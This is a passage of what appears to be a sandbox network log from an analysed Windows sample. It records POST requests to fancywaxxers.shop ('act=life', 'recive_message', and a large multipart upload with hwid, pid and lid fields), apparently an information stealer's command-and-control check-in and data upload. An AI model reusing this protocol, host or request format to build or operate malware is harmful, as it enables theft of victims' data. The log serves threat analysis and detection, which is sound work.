mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-03 14:21:03 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-03 14:21:03 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 37 66 45 39 34 58 63 63 55 6b 57 2b 42 59 6b 49 7a 4e 33 6a 4b 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 7fE94XccUkW+BYkIzN3jKA.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-03 14:21:11 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 75 65 39 76 4c 46 4d 36 71 30 6d 58 32 39 6b 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 31 66 62 30 39 38 39 31 36 63 62 61 64 30 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ue9vLFM6q0mX29kz.1Context: b1fb098916cbad0c
2025-01-03 14:21:11 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-03 14:21:11 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 65 39 76 4c 46 4d 36 71 30 6d 58 32 39 6b 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 31 66 62 30 39 38 39 31 36 63 62 61 64 30 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 51 67 34 62 35 38 63 53 30 56 55 49 44 6e 74 37 30 6a 74 4a 77 33 52 6f 42 41 57 50 58 6b 44 58 37 55 5a 6d 62 6f 64 76 54 4d 78 72 37 66 78 5a 4b 69 4f 57 66 37 54 33 35 6e 79 79 68 4f 6a 43 50 4b 4f 5a 36 77 65 52 54 2b 68 2f 4f 39 77 42 31 2b 76 34 56 67 63 38 31 2b 4b 70 39 62 61 69 54 69 42 54 50 67 72 70 62 45 4c 66 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ue9vLFM6q0mX29kz.2Context: b1fb098916cbad0c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaQg4b58cS0VUIDnt70jtJw3RoBAWPXkDX7UZmbodvTMxr7fxZKiOWf7T35nyyhOjCPKOZ6weRT+h/O9wB1+v4Vgc81+Kp9baiTiBTPgrpbELf
2025-01-03 14:21:11 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 75 65 39 76 4c 46 4d 36 71 30 6d 58 32 39 6b 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 31 66 62 30 39 38 39 31 36 63 62 61 64 30 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ue9vLFM6q0mX29kz.3Context: b1fb098916cbad0c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-03 14:21:11 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-03 14:21:11 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 58 65 56 37 56 4e 62 58 2f 30 43 32 32 77 6d 42 47 74 77 4c 66 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: XeV7VNbX/0C22wmBGtwLfA.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-03 14:21:13 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2025-01-03 14:21:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-03 14:21:13 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h7vgrikomfphkflf3qb8kqfun1; expires=Tue, 29 Apr 2025 08:07:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9I182QYS3ypljIiC1TBhtBvoI7pU%2FbXU64HuIBG6EjA2rtVlqKGB4K%2Fxzj4CYqJw4IVDLbw%2FJQumlmYD%2BZvDWU0xkHyIPPUzHM7wMfdt7K0eojstnKCQAWbW5fMOWqaZnQbHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc3a24d3909729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=1971&rtt_var=806&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1303571&cwnd=169&unsent_bytes=0&cid=a6cb7ee5c248b4c6&ts=548&x=0"
2025-01-03 14:21:13 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-03 14:21:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-03 14:21:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: fancywaxxers.shop
2025-01-03 14:21:14 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2025-01-03 14:21:14 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7ttjj5odp98cfhvks8noekkf0r; expires=Tue, 29 Apr 2025 08:07:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDnHtPx5K2X7kvo5P7jmNMw0upRbq%2F5q6WPFJ2OMxZXCi7oafVUYjTxnNxFawLlaFbXtUNyMfz9ZmfN%2FAMxsatlukgSoC4B9gcM%2BhAqjaf8hkrQBKjRm9vt9uMoa6TO0V1xDyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc3a2536e140f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1555&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1806930&cwnd=221&unsent_bytes=0&cid=afe2f7b8c709ad6b&ts=474&x=0"
2025-01-03 14:21:14 UTC	240	IN	Data Raw: 31 63 61 35 0d 0a 70 4a 49 57 49 41 53 30 2b 59 64 48 79 33 4f 62 2b 5a 50 66 45 6e 4e 34 70 4e 37 6e 4a 67 39 37 35 52 63 64 5a 59 45 61 30 65 6a 66 73 47 41 43 50 6f 44 56 70 54 53 75 55 61 47 4e 34 61 70 33 58 31 72 46 75 73 55 63 61 52 71 4a 5a 48 68 4a 6f 32 79 38 79 70 37 30 64 30 78 33 30 64 57 6c 49 72 4e 52 6f 61 4c 6f 2f 58 63 64 57 70 37 38 67 6b 78 74 47 6f 6c 31 66 41 37 75 61 72 32 4c 7a 50 35 78 53 47 48 58 6e 65 59 72 70 68 62 2b 6e 50 4b 31 66 42 6f 56 7a 4c 50 46 43 69 30 65 6e 7a 55 6e 52 38 78 2f 70 59 6e 70 38 32 56 4c 4a 73 6e 56 2f 47 57 75 48 62 6e 44 73 62 35 33 45 52 54 43 75 6f 78 4f 5a 78 4f 42 64 48 6b 50 38 58 4f 33 67 4d 7a 77 63 6b 6c 72 33 6f 6e 72 49 61 45 64 2b 4a 62 79 2f 54 Data Ascii: 1ca5pJIWIAS0+YdHy3Ob+ZPfEnN4pN7nJg975RcdZYEa0ejfsGACPoDVpTSuUaGN4ap3X1rFusUcaRqJZHhJo2y8yp70d0x30dWlIrNRoaLo/XcdWp78gkxtGol1fA7uar2LzP5xSGHXneYrphb+nPK1fBoVzLPFCi0enzUnR8x/pYnp82VLJsnV/GWuHbnDsb53ERTCuoxOZxOBdHkP8XO3gMzwcklr3onrIaEd+Jby/T
2025-01-03 14:21:14 UTC	1369	IN	Data Raw: 35 52 48 64 37 38 33 51 51 2b 4b 34 52 6b 62 68 4c 75 61 4c 58 4b 32 62 35 74 41 6d 48 61 32 37 31 6c 6f 52 33 33 6e 76 4b 79 64 78 41 61 31 4c 4f 46 52 32 55 52 67 33 39 77 43 4f 78 32 75 59 33 4f 2b 58 4e 4e 59 64 36 64 36 69 62 70 58 37 6d 63 36 66 30 6f 55 54 72 57 76 34 5a 51 59 41 6a 48 61 6a 45 65 6f 33 2b 2f 79 70 36 77 63 6b 78 6e 32 35 76 33 4c 61 49 61 2f 49 6e 36 74 48 30 63 47 73 75 32 69 6b 64 74 48 6f 31 2f 63 41 33 6e 64 62 36 4d 78 76 41 30 44 43 62 52 67 36 56 39 36 54 4c 38 69 2f 61 78 5a 6c 4d 67 68 71 50 4c 58 53 30 65 69 7a 55 6e 52 2b 74 39 73 49 6e 4e 2f 33 64 4b 62 63 53 62 39 79 4f 6b 46 4f 75 64 39 4c 4e 36 45 67 6a 4d 73 6f 4e 48 5a 42 4b 4f 63 48 67 44 6f 7a 62 7a 6a 64 36 77 4c 41 4a 48 32 35 44 70 4c 37 34 52 75 59 53 2f 70 Data Ascii: 5RHd783QQ+K4RkbhLuaLXK2b5tAmHa271loR33nvKydxAa1LOFR2URg39wCOx2uY3O+XNNYd6d6ibpX7mc6f0oUTrWv4ZQYAjHajEeo3+/yp6wckxn25v3LaIa/In6tH0cGsu2ikdtHo1/cA3ndb6MxvA0DCbRg6V96TL8i/axZlMghqPLXS0eizUnR+t9sInN/3dKbcSb9yOkFOud9LN6EgjMsoNHZBKOcHgDozbzjd6wLAJH25DpL74RuYS/p
2025-01-03 14:21:14 UTC	1369	IN	Data Raw: 4b 74 6f 4e 4c 59 42 58 48 4f 7a 38 41 2b 7a 6a 72 79 75 7a 7a 59 45 46 73 6c 4b 37 6d 4b 36 63 57 37 39 76 75 38 32 6c 52 48 63 72 38 33 51 52 67 47 49 39 7a 62 51 6a 75 65 37 32 45 79 66 56 37 53 6d 62 57 6c 75 41 68 6f 68 72 36 6c 76 57 76 65 68 45 53 77 37 32 50 54 69 31 58 78 33 4a 6e 52 37 73 34 67 70 33 4e 73 6b 46 42 61 4e 69 63 38 32 57 32 58 2b 44 62 39 72 45 77 53 56 72 4c 74 49 42 42 59 68 69 4e 65 33 6f 4e 37 33 43 39 69 64 54 2f 63 45 4a 71 33 70 48 6f 4b 36 30 5a 38 4a 44 36 75 33 41 51 45 49 62 79 78 55 4e 31 57 64 38 31 53 77 44 76 64 62 7a 49 38 2f 4e 36 54 47 48 41 32 2f 70 72 73 46 48 2b 6c 37 48 6c 4d 42 30 54 78 72 65 50 51 47 30 65 69 6e 42 38 41 4f 42 31 74 49 44 49 39 33 42 4f 62 39 75 64 35 53 4b 74 46 4f 75 65 2b 4c 46 38 55 56 Data Ascii: KtoNLYBXHOz8A+zjryuzzYEFslK7mK6cW79vu82lRHcr83QRgGI9zbQjue72EyfV7SmbWluAhohr6lvWvehESw72PTi1Xx3JnR7s4gp3NskFBaNic82W2X+Db9rEwSVrLtIBBYhiNe3oN73C9idT/cEJq3pHoK60Z8JD6u3AQEIbyxUN1Wd81SwDvdbzI8/N6TGHA2/prsFH+l7HlMB0TxrePQG0einB8AOB1tIDI93BOb9ud5SKtFOue+LF8UV
2025-01-03 14:21:14 UTC	1369	IN	Data Raw: 57 79 4d 41 78 33 4a 7a 52 37 73 34 75 6f 50 55 2f 6e 70 4c 61 39 43 54 34 69 75 6b 47 76 2b 51 39 72 70 32 48 42 4c 4c 75 59 5a 46 61 52 4f 56 64 6e 51 4e 37 6e 4c 7a 78 49 62 33 62 41 49 2b 6c 72 7a 70 44 4c 6b 4b 36 34 32 78 6f 6a 34 49 57 73 47 77 78 52 77 74 47 6f 68 38 63 41 2f 72 64 37 79 4f 79 50 5a 79 54 32 50 5a 6b 66 63 74 70 78 7a 79 6c 50 71 76 63 42 77 65 79 72 69 4e 54 32 64 5a 79 54 56 34 48 36 4d 67 38 37 2f 4c 2f 33 52 42 63 4a 61 45 71 7a 7a 70 46 76 58 62 71 66 31 38 48 78 72 4a 73 49 6c 50 5a 52 69 4c 65 33 67 43 36 6e 43 37 6d 4d 66 30 66 45 4e 6f 32 5a 72 68 49 4b 77 56 2f 70 2f 33 73 6a 42 66 57 73 47 6b 78 52 77 74 4e 71 42 41 50 53 62 5a 4f 4b 7a 45 33 37 42 7a 54 69 61 4f 32 2b 6b 6d 70 52 6e 32 6e 66 69 78 65 68 67 52 79 72 65 Data Ascii: WyMAx3JzR7s4uoPU/npLa9CT4iukGv+Q9rp2HBLLuYZFaROVdnQN7nLzxIb3bAI+lrzpDLkK642xoj4IWsGwxRwtGoh8cA/rd7yOyPZyT2PZkfctpxzylPqvcBweyriNT2dZyTV4H6Mg87/L/3RBcJaEqzzpFvXbqf18HxrJsIlPZRiLe3gC6nC7mMf0fENo2ZrhIKwV/p/3sjBfWsGkxRwtNqBAPSbZOKzE37BzTiaO2+kmpRn2nfixehgRyre
2025-01-03 14:21:14 UTC	1369	IN	Data Raw: 59 4a 36 66 67 62 6c 61 72 53 44 31 50 35 35 54 57 37 65 6b 75 51 68 72 42 7a 2f 6c 2f 75 38 64 78 38 55 7a 76 7a 4c 42 47 6f 42 78 79 30 2f 4a 76 4e 6a 6f 5a 7a 4c 30 58 6c 4e 4a 73 6e 56 2f 47 57 75 48 62 6e 44 73 62 52 69 46 52 66 55 74 59 4a 4b 59 68 71 56 64 48 49 4d 38 58 2b 38 6a 73 48 38 63 6b 31 67 31 35 37 76 4b 61 34 55 38 70 54 39 2f 54 35 52 48 64 37 38 33 51 52 44 45 70 52 69 66 41 6e 6f 62 71 6a 4b 32 62 35 74 41 6d 48 61 32 37 31 6c 71 68 72 79 6e 2f 47 78 63 42 55 58 78 71 36 4b 51 32 6f 51 6a 47 64 31 41 4f 52 7a 75 34 48 4a 39 6d 5a 4f 61 4d 53 65 39 7a 66 70 58 37 6d 63 36 66 30 6f 55 53 7a 42 72 4a 56 48 4c 79 69 52 64 6d 6b 4d 37 6e 54 7a 6c 59 6a 70 4e 45 56 71 6c 73 4f 6c 49 36 59 59 2b 70 54 77 74 48 77 63 48 38 2b 35 68 45 4a 70 Data Ascii: YJ6fgblarSD1P55TW7ekuQhrBz/l/u8dx8UzvzLBGoBxy0/JvNjoZzL0XlNJsnV/GWuHbnDsbRiFRfUtYJKYhqVdHIM8X+8jsH8ck1g157vKa4U8pT9/T5RHd783QRDEpRifAnobqjK2b5tAmHa271lqhryn/GxcBUXxq6KQ2oQjGd1AORzu4HJ9mZOaMSe9zfpX7mc6f0oUSzBrJVHLyiRdmkM7nTzlYjpNEVqlsOlI6YY+pTwtHwcH8+5hEJp
2025-01-03 14:21:14 UTC	1369	IN	Data Raw: 77 63 6f 32 66 39 6b 34 62 33 65 41 49 2b 6c 70 6a 69 4a 71 67 62 38 4a 66 2b 75 6e 51 44 45 4d 47 75 68 45 56 6d 46 49 74 31 63 67 72 70 65 62 71 48 79 76 31 7a 52 57 6e 54 32 36 74 6c 72 67 6d 35 77 37 47 63 66 52 6f 57 6e 65 62 46 57 79 4d 41 78 33 4a 7a 52 37 73 34 73 34 44 44 2b 6e 6c 42 61 64 57 4a 35 43 4f 37 45 66 53 52 34 37 64 37 46 42 66 4c 73 59 5a 43 61 78 4b 4c 5a 33 59 48 34 48 50 7a 78 49 62 33 62 41 49 2b 6c 72 6a 79 4d 36 4d 57 39 59 33 36 76 48 4d 48 46 39 62 38 79 77 52 38 48 70 59 31 4a 78 48 7a 62 37 53 56 69 4f 6b 30 52 57 71 57 77 36 55 6a 6f 42 66 2b 6e 66 2b 76 64 52 63 56 79 62 57 4d 51 47 55 61 68 33 46 37 41 4f 5a 37 76 34 48 42 38 33 74 47 62 39 69 53 36 6d 58 6e 55 66 36 44 73 65 55 77 4d 41 48 46 73 49 67 45 63 6c 65 65 4e Data Ascii: wco2f9k4b3eAI+lpjiJqgb8Jf+unQDEMGuhEVmFIt1cgrpebqHyv1zRWnT26tlrgm5w7GcfRoWnebFWyMAx3JzR7s4s4DD+nlBadWJ5CO7EfSR47d7FBfLsYZCaxKLZ3YH4HPzxIb3bAI+lrjyM6MW9Y36vHMHF9b8ywR8HpY1JxHzb7SViOk0RWqWw6UjoBf+nf+vdRcVybWMQGUah3F7AOZ7v4HB83tGb9iS6mXnUf6DseUwMAHFsIgEcleeN
2025-01-03 14:21:14 UTC	256	IN	Data Raw: 2f 71 38 71 65 73 46 52 4a 63 4e 4f 63 38 32 65 63 45 76 65 56 39 71 73 77 44 69 57 49 2f 49 70 65 4c 55 47 2b 62 44 38 41 37 7a 6a 72 79 74 50 33 64 45 56 38 77 4a 7a 70 4e 4b 49 63 39 62 6e 2b 75 6d 59 53 46 63 57 74 6a 41 68 6d 46 4d 63 37 50 77 44 37 4f 4f 76 4b 36 66 64 69 51 55 6e 56 69 75 78 6c 35 31 48 2b 6a 62 48 6c 4d 43 39 61 31 4c 2b 56 52 32 49 49 75 54 55 6e 48 74 30 34 75 4a 7a 42 34 48 64 55 62 64 75 58 39 42 76 70 53 61 33 4a 6f 2b 38 69 51 77 57 47 6f 37 6f 4b 4c 52 6a 48 4c 55 59 65 6f 32 37 7a 30 70 53 2b 4e 46 41 6d 6a 74 75 69 4a 72 73 44 2f 35 6a 6e 76 6a 63 76 4a 4f 47 71 6a 30 4e 39 48 70 42 36 50 30 6d 6a 64 2f 50 53 2f 37 42 39 52 58 33 48 6a 65 67 31 72 6c 48 47 31 62 47 6c 4d 45 6c 61 38 37 2b 4c 53 6d 6f 50 6c 6a 68 59 45 0d Data Ascii: /q8qesFRJcNOc82ecEveV9qswDiWI/IpeLUG+bD8A7zjrytP3dEV8wJzpNKIc9bn+umYSFcWtjAhmFMc7PwD7OOvK6fdiQUnViuxl51H+jbHlMC9a1L+VR2IIuTUnHt04uJzB4HdUbduX9BvpSa3Jo+8iQwWGo7oKLRjHLUYeo27z0pS+NFAmjtuiJrsD/5jnvjcvJOGqj0N9HpB6P0mjd/PS/7B9RX3Hjeg1rlHG1bGlMEla87+LSmoPljhYE
2025-01-03 14:21:14 UTC	1369	IN	Data Raw: 32 63 65 66 0d 0a 65 6c 2f 6f 34 33 52 2f 7a 51 4d 4a 74 44 62 76 58 62 6e 55 66 32 4b 73 65 55 67 51 30 47 54 37 39 49 55 50 77 62 4a 62 44 38 52 6f 79 44 68 78 49 62 69 4e 42 6f 6d 6b 5a 6a 33 4e 36 38 53 37 35 69 32 67 30 34 32 41 4d 75 36 6b 6c 56 54 4a 34 42 76 63 67 48 30 61 66 2b 66 78 66 35 36 52 58 43 57 31 61 55 71 36 55 6e 41 32 37 6e 39 54 31 39 61 33 76 7a 64 42 46 67 61 69 58 74 34 45 66 49 31 6c 4a 44 4c 39 6d 4e 54 4a 70 6a 62 34 32 58 78 51 37 66 62 39 61 77 77 53 55 71 55 35 39 41 58 4f 6b 6e 56 61 6a 45 65 6f 32 37 7a 30 70 53 2b 4e 46 41 6d 6a 74 75 69 4a 72 73 44 2f 35 6a 6e 76 6a 63 76 4a 4f 69 37 67 30 46 71 43 63 56 62 64 42 50 6b 4f 50 33 4b 79 62 41 73 65 79 61 65 32 39 70 72 36 51 6d 35 77 37 47 49 63 78 38 55 77 61 71 55 43 55 Data Ascii: 2cefel/o43R/zQMJtDbvXbnUf2KseUgQ0GT79IUPwbJbD8RoyDhxIbiNBomkZj3N68S75i2g042AMu6klVTJ4BvcgH0af+fxf56RXCW1aUq6UnA27n9T19a3vzdBFgaiXt4EfI1lJDL9mNTJpjb42XxQ7fb9awwSUqU59AXOknVajEeo27z0pS+NFAmjtuiJrsD/5jnvjcvJOi7g0FqCcVbdBPkOP3KybAseyae29pr6Qm5w7GIcx8UwaqUCU
2025-01-03 14:21:14 UTC	1369	IN	Data Raw: 4a 31 57 74 4f 4b 48 4b 6e 72 41 7a 51 58 54 45 6e 65 59 7a 71 6c 62 48 70 64 61 7a 64 78 41 4d 31 71 75 4b 65 6c 4d 4d 68 48 74 78 41 50 56 70 38 38 53 47 2f 7a 51 61 58 35 62 54 70 52 72 6e 55 65 48 62 71 66 31 46 45 68 54 49 75 35 4e 56 49 44 36 4a 63 6e 34 52 38 32 2b 38 79 6f 69 77 63 67 49 2b 68 4e 57 6c 49 62 68 52 6f 63 75 6a 35 69 56 43 54 5a 62 75 6d 67 70 30 57 5a 45 31 4a 31 57 74 4f 4b 48 4b 6e 72 41 7a 51 58 54 45 6e 65 59 7a 71 6c 62 48 70 64 61 7a 64 78 41 4d 31 71 75 4b 43 30 4d 76 70 6b 74 42 45 75 42 32 76 59 33 51 34 54 51 4d 4a 74 6e 62 76 52 7a 70 57 62 6d 6b 76 2f 31 6f 55 55 4b 47 69 59 5a 4b 59 78 36 52 5a 44 49 67 37 58 2b 79 6e 4e 62 6e 65 77 31 49 34 4c 71 6c 61 2b 6b 58 75 63 4f 6a 38 7a 41 56 43 34 62 6b 31 52 59 32 54 4e 51 Data Ascii: J1WtOKHKnrAzQXTEneYzqlbHpdazdxAM1quKelMMhHtxAPVp88SG/zQaX5bTpRrnUeHbqf1FEhTIu5NVID6Jcn4R82+8yoiwcgI+hNWlIbhRocuj5iVCTZbumgp0WZE1J1WtOKHKnrAzQXTEneYzqlbHpdazdxAM1quKC0MvpktBEuB2vY3Q4TQMJtnbvRzpWbmkv/1oUUKGiYZKYx6RZDIg7X+ynNbnew1I4Lqla+kXucOj8zAVC4bk1RY2TNQ

Timestamp	Bytes transferred	Direction	Data
2025-01-03 14:21:15 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZV4K5TSOVEP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12817 Host: fancywaxxers.shop
2025-01-03 14:21:15 UTC	12817	OUT	Data Raw: 2d 2d 5a 56 34 4b 35 54 53 4f 56 45 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 33 35 46 37 33 45 46 35 30 41 45 46 35 35 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 5a 56 34 4b 35 54 53 4f 56 45 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 56 34 4b 35 54 53 4f 56 45 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 56 34 4b 35 54 53 4f 56 45 50 0d 0a 43 6f 6e 74 Data Ascii: --ZV4K5TSOVEPContent-Disposition: form-data; name="hwid"8035F73EF50AEF55822D1F4978021086--ZV4K5TSOVEPContent-Disposition: form-data; name="pid"2--ZV4K5TSOVEPContent-Disposition: form-data; name="lid"PsFKDg--pablo--ZV4K5TSOVEPCont
2025-01-03 14:21:16 UTC	1138	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ej53ums8acr758o2lmovmq0378; expires=Tue, 29 Apr 2025 08:07:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAn9Yk9OBZQxnZ0r4u%2BFyHQxvPQjPi972LHiaFo%2FPlstM14tqyJ%2BqIbKIBLRPcLAQl0tyNrkfj%2FQauvd%2F4IQwLdJikN0wJC5GZOoCigr51VC7m1Vt%2FFA5L6rP8I2Mnyeo0iSNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc3a25c8c08727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2001&rtt_var=757&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13751&delivery_rate=1439842&cwnd=232&unsent_bytes=0&cid=8030f0e2a8364306&ts=514&x=0"
2025-01-03 14:21:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 14:21:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
